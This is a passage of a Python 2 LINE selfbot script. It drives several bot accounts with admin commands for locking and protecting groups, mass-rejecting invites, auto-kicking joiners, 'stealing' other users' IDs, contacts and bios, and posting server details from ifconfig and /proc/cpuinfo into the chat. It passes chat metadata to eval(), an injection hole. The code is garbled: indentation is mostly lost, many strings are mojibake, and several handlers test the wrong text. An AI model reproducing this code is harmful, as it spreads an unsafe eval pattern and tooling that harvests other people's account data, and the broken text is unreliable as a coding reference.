elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
#==================================
#==================================================
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'dul restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
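	# Server-info commands: ifconfig / system / kernel / cpu shell out via subprocess.Popen and
	# echo the command output back into the chat.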
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
		if msg.from_ in admin:
			uye = random.choice(KAC)  # choose the responder before the group check so the else branch can use it
			if msg.toType == 2:
				X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
		if msg.from_ in admin:
			uye = random.choice(KAC)  # choose the responder before the group check so the else branch can use it
			if msg.toType == 2:
				X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in admin:
			# sys.exit() raises SystemExit, which the old bare except swallowed; exit directly instead
			sys.exit()
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
#===========================================================
#=======================================================
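	# Translator commands: T-eng / T-japan / T-thai / T-id feed the trailing text to goslate and
	# reply with the en / ja / th / id translation.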
elif "T-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-japan ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-id " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
#==========================================================================
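	# "Mode on" / "Mode off" are deliberately handled by a chain of separate if-statements: one
	# command closes or opens the group QR link, rejects pending invites, and flips every
	# protection flag (Protectgr, Protectcancl, Protectjoin, protectionOn, qr, the name lock
	# and the invite blocker) in a single pass.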
elif msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Boss")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
if "Mode on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
			wait['pro_name'][msg.to] = cl.getGroup(msg.to).name  # store the locked name under pro_name, matching Namelock:on below
if "Mode on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
#==========================================================================
elif msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if "Mode off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
if "Mode off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#==========================================================================
#======================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
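	# "Steal mid" / "Steal contact": read the @mention metadata to get the target's mid, then
	# reply with the raw mid or resend it as a contact card (contentType 13).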
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)#=================
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","Join on","Auto join on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","Join off","Auto join off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°�组ç���¨è‡ªåŠ¨é‚€è¯·æ���’ç»�")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自��‹•退出ï¼��é—œ"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["å���±æœ‰:オフ","Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Status","Set"]:
if msg.from_ in admin:
md = "⭐Status Protection*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+="[•]Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["Backup"] == True: md+="[•]Backup : on\n"
else:md+="[•]Backup : off\n"
if wait["qr"] == True: md+="[•]AutoBlock QR : on\n"
else:md+="[•]AutoBlock QR : off\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n"
if wait["protectionOn"] == True: md+="[•]Protection : hight\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="[•]Protection : low\n"+ datetime.today().strftime('%H:%M:%S')
"\n*============*\n⭐✰ (☆─┅═ই╬BABANG ADHI)=======*"
cl.sendText(msg.to,md)
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的ç���¸å†Œ"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "album remove " in msg.text:
gid = msg.text.replace("album remove ","")
